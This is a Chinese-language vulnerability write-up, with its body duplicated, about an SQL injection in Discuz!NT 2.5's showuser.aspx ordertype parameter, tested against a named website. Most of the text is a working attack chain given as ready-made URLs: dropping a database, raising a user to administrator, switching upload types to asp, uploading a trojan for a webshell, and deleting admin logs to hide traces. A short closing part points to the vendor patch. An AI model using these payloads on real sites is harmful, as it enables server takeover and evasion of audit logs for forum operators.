Discuz!NT 2.5最新注入漏洞測試分析(圖)
互聯(lián)網(wǎng) 發(fā)布時間:2008-10-08 20:02:14 作者:佚名
我要評論

Discuz!NT是一款功能強(qiáng)大的基于ASP.net平臺的BBS系統(tǒng),占有不少的市場份額,特別是一些大中型專業(yè)社區(qū)都采用該系統(tǒng)。最近,ISTO成員在其最新的2.5版本中發(fā)現(xiàn)了一個安全漏洞,成功利用此漏洞可以直接修改管理員的密碼進(jìn)入后臺,取得管理員權(quán)限,從而控制整個網(wǎng)站。下面筆者
Discuz!NT是一款功能強(qiáng)大的基于ASP.net平臺的BBS系統(tǒng),占有不少的市場份額,特別是一些大中型專業(yè)社區(qū)都采用該系統(tǒng)。最近,ISTO成員在其最新的2.5版本中發(fā)現(xiàn)了一個安全漏洞,成功利用此漏洞可以直接修改管理員的密碼進(jìn)入后臺,取得管理員權(quán)限,從而控制整個網(wǎng)站。下面筆者部署環(huán)境解析該漏洞,以期引起大家的重視。
環(huán)境描述
操作系統(tǒng):Windows 2003
Discuz!NT版本:2.5
URL:http://www.gslw.com
數(shù)據(jù)庫:SQL Server 2005
1、漏洞起因
漏洞是由showuser.aspx文件引起的,該文件的作用是顯示論壇的會員列表。由于腳本中對于用來用戶排序的ordertype參數(shù)未經(jīng)過濾而直接查詢數(shù)據(jù)庫,攻擊者可以通過精心構(gòu)造的ordertype參數(shù)進(jìn)行數(shù)據(jù)庫的寫操作。(圖1)
2、漏洞測試
判斷Discuz!NT是否存在該漏洞,我們可以構(gòu)造ordertype參數(shù)進(jìn)程測試。下面代碼的意思是刪除gslw數(shù)據(jù)庫,由于不存在gslw數(shù)據(jù)庫因此會報錯“無法對數(shù)據(jù)庫'glsw'執(zhí)行刪除,因為它不存在,或者您沒有所需的權(quán)限?!边@就說明執(zhí)行了數(shù)據(jù)庫操作,我們可以根據(jù)錯誤信息判斷是否存在該漏洞。我們構(gòu)造的URl為
http://www.gslw.com/showuser.aspx?ordertype=desc;drop database glsw;--
顯示的錯誤頁面見圖1,說明存在該漏洞。(圖2)
3、用戶提權(quán)
打開論壇注冊一個用戶為hacker的會員見圖3,然后我們可以進(jìn)行構(gòu)造一段URL通過showuser.aspx的ordertype參數(shù)將hacker提升為管理員。構(gòu)造的URL為“http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_users set adminid='1',groupid='1' where username='hacker';--”其作用就是將注冊用戶hacker的adminid和guoupid設(shè)置為1,也就是將其提升為管理員。將該URL輸入瀏覽器地址欄回車后可以看到hacker被提升為管理員見圖4。(圖3)(圖4)
hacker被提升為管理員后就可以登錄系統(tǒng)后臺進(jìn)行各種操作了。Discuz!NT的后臺功能確實比較強(qiáng)大,(圖5)
4、更改上傳格式
該漏洞除了可以提升管理員為,還可以更改默認(rèn)的附件上傳格式。默認(rèn)情況下,Discuz!NT只支持jpg,gif,png,zip,rar,jpeg格式的附件上傳,利用該漏洞可以將其中的某種格式替換為asp、aspx等可執(zhí)行腳本的格式,從而獲得一個Webshell。我們可以構(gòu)造URL更改其上傳文件格式,比如我們將jgp格式更改為aspx格式,就可以構(gòu)造這樣的URL“http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='asp' where extension='jpg';--” ,最終的執(zhí)行效果見圖6。(圖6)
5、獲得Webshell
通過上面的操作我們就可以在任意一論壇版塊下發(fā)表新主題 ,然后通過附件上傳功能將以asp木馬上傳到服務(wù)器。上傳完成后,在“我的附件”項下可以找到上傳的asp木馬,點擊該asp網(wǎng)馬就直接運(yùn)行,登錄后獲得一個webshell。(圖7)
6、清除痕跡
獲得webshell后,就可以通過該漏洞構(gòu)造URL清除痕跡,恢復(fù)Discuz!NT的默認(rèn)狀態(tài)。主要包括一下幾項:
http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='jpg' where extension='asp';-- 改回jpg格式
http://www.gslw.com/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username='hacker';-- 清除日志
http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_users set adminid='',groupid='' where username='hacker';-- hacker降權(quán)限
7、總結(jié)及防范
從上面的演示可以看到該漏洞對采用Discuz!NT的BBS威脅極大,攻擊者不僅能夠進(jìn)入后臺,而且可以獲取webshell,進(jìn)而滲透控制服務(wù)器。筆者上面演示用的是asp木馬,如果用aspx木馬其權(quán)限將更大,拿下服務(wù)器將會更容易。
針對此漏洞Discuz!NT官方提供了補(bǔ)丁,該補(bǔ)丁的地址為:
http://download.comsenz.com/DiscuzNT/patch/dnt_25_n2_patch20080829.zip
修正方法是將壓縮包中的Discuz.Web.dll文件上傳到bin目錄,覆蓋掉以前的文件。雖然Discuz!NT比較迅速地發(fā)布了補(bǔ)丁,但是筆者在此刻進(jìn)行了安全測試,有相當(dāng)多的采用Discuz!NT 2.5系統(tǒng)的BBS論壇依舊沒有打該補(bǔ)丁。希望通過此文,能夠引起大家對該漏洞的重視,盡快修復(fù)漏洞。
環(huán)境描述
操作系統(tǒng):Windows 2003
Discuz!NT版本:2.5
URL:http://www.gslw.com
數(shù)據(jù)庫:SQL Server 2005
1、漏洞起因
漏洞是由showuser.aspx文件引起的,該文件的作用是顯示論壇的會員列表。由于腳本中對于用來用戶排序的ordertype參數(shù)未經(jīng)過濾而直接查詢數(shù)據(jù)庫,攻擊者可以通過精心構(gòu)造的ordertype參數(shù)進(jìn)行數(shù)據(jù)庫的寫操作。(圖1)

2、漏洞測試
判斷Discuz!NT是否存在該漏洞,我們可以構(gòu)造ordertype參數(shù)進(jìn)程測試。下面代碼的意思是刪除gslw數(shù)據(jù)庫,由于不存在gslw數(shù)據(jù)庫因此會報錯“無法對數(shù)據(jù)庫'glsw'執(zhí)行刪除,因為它不存在,或者您沒有所需的權(quán)限?!边@就說明執(zhí)行了數(shù)據(jù)庫操作,我們可以根據(jù)錯誤信息判斷是否存在該漏洞。我們構(gòu)造的URl為
http://www.gslw.com/showuser.aspx?ordertype=desc;drop database glsw;--
顯示的錯誤頁面見圖1,說明存在該漏洞。(圖2)

3、用戶提權(quán)
打開論壇注冊一個用戶為hacker的會員見圖3,然后我們可以進(jìn)行構(gòu)造一段URL通過showuser.aspx的ordertype參數(shù)將hacker提升為管理員。構(gòu)造的URL為“http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_users set adminid='1',groupid='1' where username='hacker';--”其作用就是將注冊用戶hacker的adminid和guoupid設(shè)置為1,也就是將其提升為管理員。將該URL輸入瀏覽器地址欄回車后可以看到hacker被提升為管理員見圖4。(圖3)(圖4)


hacker被提升為管理員后就可以登錄系統(tǒng)后臺進(jìn)行各種操作了。Discuz!NT的后臺功能確實比較強(qiáng)大,(圖5)

4、更改上傳格式
該漏洞除了可以提升管理員為,還可以更改默認(rèn)的附件上傳格式。默認(rèn)情況下,Discuz!NT只支持jpg,gif,png,zip,rar,jpeg格式的附件上傳,利用該漏洞可以將其中的某種格式替換為asp、aspx等可執(zhí)行腳本的格式,從而獲得一個Webshell。我們可以構(gòu)造URL更改其上傳文件格式,比如我們將jgp格式更改為aspx格式,就可以構(gòu)造這樣的URL“http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='asp' where extension='jpg';--” ,最終的執(zhí)行效果見圖6。(圖6)

5、獲得Webshell
通過上面的操作我們就可以在任意一論壇版塊下發(fā)表新主題 ,然后通過附件上傳功能將以asp木馬上傳到服務(wù)器。上傳完成后,在“我的附件”項下可以找到上傳的asp木馬,點擊該asp網(wǎng)馬就直接運(yùn)行,登錄后獲得一個webshell。(圖7)

6、清除痕跡
獲得webshell后,就可以通過該漏洞構(gòu)造URL清除痕跡,恢復(fù)Discuz!NT的默認(rèn)狀態(tài)。主要包括一下幾項:
http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='jpg' where extension='asp';-- 改回jpg格式
http://www.gslw.com/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username='hacker';-- 清除日志
http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_users set adminid='',groupid='' where username='hacker';-- hacker降權(quán)限
7、總結(jié)及防范
從上面的演示可以看到該漏洞對采用Discuz!NT的BBS威脅極大,攻擊者不僅能夠進(jìn)入后臺,而且可以獲取webshell,進(jìn)而滲透控制服務(wù)器。筆者上面演示用的是asp木馬,如果用aspx木馬其權(quán)限將更大,拿下服務(wù)器將會更容易。
針對此漏洞Discuz!NT官方提供了補(bǔ)丁,該補(bǔ)丁的地址為:
http://download.comsenz.com/DiscuzNT/patch/dnt_25_n2_patch20080829.zip
修正方法是將壓縮包中的Discuz.Web.dll文件上傳到bin目錄,覆蓋掉以前的文件。雖然Discuz!NT比較迅速地發(fā)布了補(bǔ)丁,但是筆者在此刻進(jìn)行了安全測試,有相當(dāng)多的采用Discuz!NT 2.5系統(tǒng)的BBS論壇依舊沒有打該補(bǔ)丁。希望通過此文,能夠引起大家對該漏洞的重視,盡快修復(fù)漏洞。
相關(guān)文章
- 偶爾在網(wǎng)上看到這些,拿來和大家一塊看看,也好讓各個站長懂得保護(hù)自己的網(wǎng)站2012-10-16
- 安全狗是一款大家熟悉的服務(wù)器安全加固產(chǎn)品,據(jù)稱已經(jīng)擁有50W的用戶量。最近經(jīng)過一些研究,發(fā)現(xiàn)安全狗的一些防護(hù)功能,例如SQL注入、文件上傳、防webshell等都可以被繞過2014-07-17
VLC媒體播放器MP4_ReadBox_rdrf()函數(shù)堆溢出漏洞
受影響系統(tǒng): VideoLAN VLC Media Player 0.8.6e 描述: VLC Media Player是一款免費(fèi)的媒體播放器。 VLC播放器的modules/demux/mp4/libmp4.c文件中的MP4_Rea2008-10-08- 有點雞肋,配合前幾天公布的iis6文件名解析漏洞達(dá)到獲取webshell的目的。2010-09-30
WordPress WassUp插件 spy.php腳本含SQL注入漏洞
受影響系統(tǒng): WordPress WassUp 1.4 - 1.4.3 不受影響系統(tǒng): WordPress WassUp 1.4.3a 描述: WordPress是一款免費(fèi)的論壇Blog系統(tǒng)。 WordPress的WassUp插件2008-10-08eWebEditor 6.2 目錄遍歷漏洞(asp/browse.asp)
最新eWebEditor 6.2版本存在目錄遍歷漏洞,漏洞頁面asp/browse.asp,可通過漏洞遍里特定目錄下的所有文件列表.2010-05-13- 首發(fā):紅科網(wǎng)安 作者:Amxking 漏洞程序:dedecms5.5 測試對象:織夢網(wǎng)CMS官方網(wǎng)站 提交時間:2010-03-17 漏洞類型:信息泄露 危險等級:低2011-03-11
Ewebeditor2.8.0最終版刪除任意文件漏洞分析與解決方法
此漏洞存在于ExampleNewsSystem目錄下的delete.asp文件中,這是ewebeditor的測試頁面,無須登陸可以直接進(jìn)入,看這些代碼: ' 把帶"|"的字符串轉(zhuǎn)為數(shù)組 Dim aS2009-04-18- 最新dedecms 5.6的注入代碼: http://www.dedecms.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2%29%29%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT%22011-03-11
手把手教你如何構(gòu)造Office漏洞POC(以CVE-2012-0158為例)
近年來APT追蹤盛行,最常見的就是各種以釣魚開始的攻擊,不僅僅有網(wǎng)站掛馬式釣魚,也有魚叉式郵件釣魚,下面小編就為大家介紹office漏洞CVE-2012-0158,一起來看看吧2016-09-28